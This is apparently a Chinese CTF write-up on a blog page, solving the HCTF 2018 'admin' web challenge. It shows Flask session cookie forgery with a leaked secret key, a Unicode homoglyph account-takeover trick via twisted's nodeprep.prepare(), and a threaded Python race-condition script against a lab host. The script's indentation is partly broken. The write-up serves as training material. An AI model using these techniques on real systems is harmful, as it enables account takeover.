[HCTF 2018]admin

最新推荐文章于 2021-07-10 09:28:47 发布
最新推荐文章于 2021-07-10 09:28:47 发布
阅读量635 收藏
点赞数
分类专栏: Python 文章标签: flask python
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/114463600
版权

文章目录


打开网页,发现 注册登录两个功能
随手注册一个,发现页面源码中提示: you are not admin
所以思路就是登录admin账号





Flask_session 伪造

注意到session的值很有特点:
.eJw9kEFrwkAUhP9K2bOHZLWXgIfIpsHA2yWyMbx3EatJsy9ZC6YluuJ_b_DQ4wzMx8w8xKG9NmMnkvY4jM1CHNxZJA_x9ikSAaoPxqYxMk5oB4c2i8h2HfHZIesOQxbI7xyGaoJQ3U2erYzdO6PKu5bVpO1pIgURBoiBNZOfPQkB5G4ATiMtswjrckk2nYg3PfE2gMK7nrWxRQ-M0qj0Hexm0H7H4MmRLyXW2Q25mubcSquBoca1eC7Eaby2h5_vvrn8T9D5nkl9BZOXS10XTHMNsNubVkUHsuhI7R3lHwyqDEadVmBTieX6hbscfTMjjmfvLmIhfsfm-npHxLF4_gH6DWZv.YEOhSw.aY9S_eCZOoAgjRCUHGxqCnXoyr0
在这里插入图片描述
所以可以猜到是利用了Flask session机制产生的session值
https://jwt.io/这是一个关于flask session的加解密网站

/change页面的源码中发现https://github.com/woadsl1234/hctf_flask/浏览网站,在config.py中发现了secret keyckj123
在这里插入图片描述
我们结合加解密脚本
先进行解密:

python flask_session_cookie_manager3.py decode -s "ckj123" -c ".eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OsZiJ26UZ3veIOBavPwJ9ZlU.Xhpxig.hIQoJq3OWXbaekJ3fHF0Tl1cQPQ"
返回结果:
{'_fresh': True, '_id': b'093905b60a9ba14e8af7bb3ac13fdbc503528a895b8427e0570d34c3523cfe07c33de2047a4ad7e00f0df2306250092d26680910e6dc2fbfd6aa1b50e0849c1f', 'csrf_token': b'4ecd838d75bcf3c12142a3bad5bdac043878106a', 'name': 'admin1', 'user_id': '11'}

admin1改成admin然后重新加密:

python flask_session_cookie_manager3.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'093905b60a9ba14e8af7bb3ac13fdbc503528a895b8427e0570d34c3523cfe07c33de2047a4ad7e00f0df2306250092d26680910e6dc2fbfd6aa1b50e0849c1f', 'csrf_token': b'4ecd838d75bcf3c12142a3bad5bdac043878106a', 'name': 'admin', 'user_id': '11'}"
返回结果:
.eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OYiZul2Z4vyPiWLz-AJ2yZiQ.YEOhNg.ueQTB6HrDkV5Uq816baaJRQyQ5w

最后修改session即可




Unicode欺骗

unicode同形字引起的安全问题
浅谈Unicode设计的安全性

这个考点才是本题的预期:

这是spotify的一个漏洞,因为nodeprep.prepare()函数,导致可以修改任意用户密码
在这里插入图片描述
nodeprep.prepare方法会将字符ᴬ转成A,再调用一次转成a。

twisted库的nodeprep.prepare()会将内容转为小写,且将其它类的编码转为ASCii;我们提交(可以查到各个字母的替换类型 )“ᴬ”nodeprep.prepare()函数转为“A”,再次(二次)nodeprep.prepare()函数会将“A”转为“a”;这是twisted库函数的特点。

流程:
1、注册ᴬdmin,经过处理Admin被插入到数据库中。
2、登录ᴬdmin。在登录的时候ᴬdmin被处理成Admin,Admin被写入session[‘name’]。
3、修改密码,此时修改的是admin的密码
4、之后再使用admin登录。在修改密码的时候Admin被处理成了admin。
5、用admin登录拿到flag。

附上两个查Unicode的网站:
https://unicode-table.com/en/137B/
https://www.compart.com/en/unicode/




条件竞争

思路就是:由于注册、登录处没有判断是否是admin用户,就贸然进行了session['name'] = name的操作,且修改密码函数处,正是利用session['name']来判断修改谁的密码。此处就有条件竞争

赶在执行B前就执行ACD,那么是不是就有机会成功修改到admin账号的密码呢?

一个进程尝试注册登录admin账号,另一个进程尝试修改密码。session['admin']始终有机会被CD利用执行
在这里插入图片描述

import requests import threading
def login(s, username, password): 
    data = {'username': username, 'password':password, 'submit': ''}
    return s.post("http://4d4e490c-4627-458b-8dd1-527ce7e1b0c9.node3.buuoj.cn/login", data=data)
def logout(s):
    return s.get("http://4d4e490c-4627-458b-8dd1-527ce7e1b0c9.node3.buuoj.cn/logout")
def change(s, newpassword): 
    data = {'newpassword':newpassword }
    return s.post("http://4d4e490c-4627-458b-8dd1-527ce7e1b0c9.node3.buuoj.cn/change", data=data)
def func1(s):
    login(s, 'ddd', 'ddd') 
    change(s, 'qweqweabcabc')
def func2(s): 
    logout(s)
    res = login(s, 'admin', 'qweqweabcabc')
    if '<a href="/index">/index</a>' in res.text:
    print('finish')
def main():
    for i in range(1000):
        print(i)
        s = requests.Session()
        t1 = threading.Thread(target=func1, args=(s,)) t2 = threading.Thread(target=func2, args=(s,)) t1.start()
            t2.start()
if __name__ == "__main__": 
    main()
D.MIND
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
admin:用户管理系统
03-31
行政 用户管理系统
admin
zhushixia1989的博客
12-15 134
AdminAdmin
xia_ye_shuai的专栏
08-26 225
<br />AdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdminAdmin
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
2018手工更新FlatLab Admin Template
09-15
"2018手工更新FlatLab Admin Template"是一款专为后台管理系统设计的模板,它集成了现代化的设计风格和丰富的功能组件。FlatLab以其扁平化的设计理念,提供了高效且直观的用户界面,使得管理员能够轻松地进行数据...
fastadmin事务管理系统
05-27
FastAdmin事务管理系统 FastAdmin事务管理系统是一种基于Web的事务管理系统,旨在帮助管理员更好地管理事务流程和数据。下面是该系统的一些重要知识点: 登录 Token 设计 FastAdmin的事务管理系统使用 Token-...
canal-admin
最新发布
02-28
《Canal Admin详解:数据库同步神器的管理平台》 Canal是阿里巴巴开源的一款高效、稳定的数据库实时增量数据订阅与消费组件,广泛应用于大数据同步、实时分析等场景。而Canal Admin则是Canal的管理工具,它为Canal...
Ace Admin 2018.4最新版
04-17
"Ace Admin 2018.4最新版" 提供了最新的更新和改进,确保了开发者可以利用最新的技术进行开发。 Ace Admin 的核心特性包括: 1. **响应式布局**:它支持各种设备,从小屏幕手机到大屏幕桌面,都能提供良好的用户...
Admin管理员登录界面
08-14
Admin管理员管理界面,自己只需做少量修改就可以用了。
定义管理员类(Admin),管理员类中的 1,属性包括:姓名、账号、密码、电话; 2,方法包括: 1)登陆的方法login():要求在方法体中输入用户名和密码,将输入的用户名和管理员对象的账号、密码相
热门推荐
HN-XX-PYY的博客
03-27 1万+
定义管理员类(Admin),管理员类中的 1,属性包括:姓名、账号、密码、电话; 2,方法包括: 1)登陆的方法login():要求在方法体中输入用户名和密码,将输入的用户名和管理员对象的账号、密码相比,如果相同则返回true,否则返回false。方法的返回值类型为boolean。 2) 自我介绍的方法introduce():在方法体中输出“我的名字是XXX,电话是XXXXX,我的账号是XXX” ...
使用 admin 管理后台
携梦问道的博客
03-08 2790
使用 admin 管理后台    后台登录地址:http://localhost:8000/admin    1、创建后台管理员(超级用户)        ./manage.py createsuperuser        Username : 用户名        Email Address : 电子邮件        Password : 密码        Password(again) ...
管理计算机的作用是什么意思,admin是什么意思 Admin的用途介绍
weixin_29982199的博客
07-10 7550
相信对于许多电脑前的菜鸟朋友来说,数码知识一种十分“神秘”的技术,我们经常会在操作电脑之后看到许多自己并不熟悉的英文单词选项,例如:admin,实际上,这个选项在我们使用电脑的过程中出现次数十分频繁,甚至在我们看到电脑注销之后就能看到这样一个英文,那么admin到底是什么意思,它的作用又有哪些呢,这就让小编来为大家介绍一下。Admin是什么实际上,adminadminister的缩写,也就是说,...
计算机主要应用是什么意思,admin是什么意思 Admin的用途介绍
weixin_34732771的博客
07-02 5775
相信对于许多电脑前的菜鸟朋友来说,数码知识一种十分“神秘”的技术,我们经常会在操作电脑之后看到许多自己并不熟悉的英文单词选项,例如:admin,实际上,这个选项在我们使用电脑的过程中出现次数十分频繁,甚至在我们看到电脑注销之后就能看到这样一个英文,那么admin到底是什么意思,它的作用又有哪些呢,这就让小编来为大家介绍一下。Admin是什么实际上,adminadminister的缩写,也就是说,...
[HCTF 2018]admin 1
feng的博客
10-20 6927
前言 这题的三种方法都是姿势盲区。。。。第三种方法只给个介绍。。因为好像复现的话不能成功,但是学习学习这种方法的思想。 姿势总结 flask session伪造 unicode欺骗 条件竞争 方法一:flask session伪造 我做题目的时候一直以为这题应该是SQL注入。。。在登录那里被卡了好久。。最后发现屁用都没有。。 首先!我们先注册一个再登录,在change password那里查看源码,可以看到有提示: 但是我并没有看到。。。这题也深深的教会了我,虽然页面可能有点多,源码还是要好好看看。。
【Django2.0学习笔记】番外篇:Django admin全面汉化
qq_42851418的博客
10-26 425
番外篇:Django admin全面汉化 1、admin汉化的作用 1)方便自己阅读 2)方便他人使用 2、admin汉化相关内容 1)语言 2)时区 3)字段名 4)admin自定义字段名 5)模块名称 6)app名称 7)admin后台标题 打开项目的settings(这里是base.py),将LANGUAGE_CODE改为'zh-hans' # LANGUAGE_CODE = 'en-us' LANGUAGE_CODE = 'zh-hans' base.py: # TIME_ZONE
admin后台系统管理(三)
陈十一yi
05-12 751
使用xadmin替换admin,使后台系统功能更为完善 创建应用 使用python .\manage.py startapp user创建user应用;应用名称可自取 在项目的setting.py中添加创建的应用 安装相关依赖包 使用pip install安装以下依赖包: future==0.15.2 httplib2==0.9.2 django-reversion==2.0.0 django-formtools==1.0 django-crispy-forms==1.6.0 django-import-
adminguide翻译
01-06
在本文中,我们将对adminguide翻译进行总结,并概述网站典型设置应用软件或中间件服务器的概况,包括JBoss App Server、Tomcat Web Container、BEA WebLogic和IBM WebSphere。此外,我们还将讨论目录39aiCache向导,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值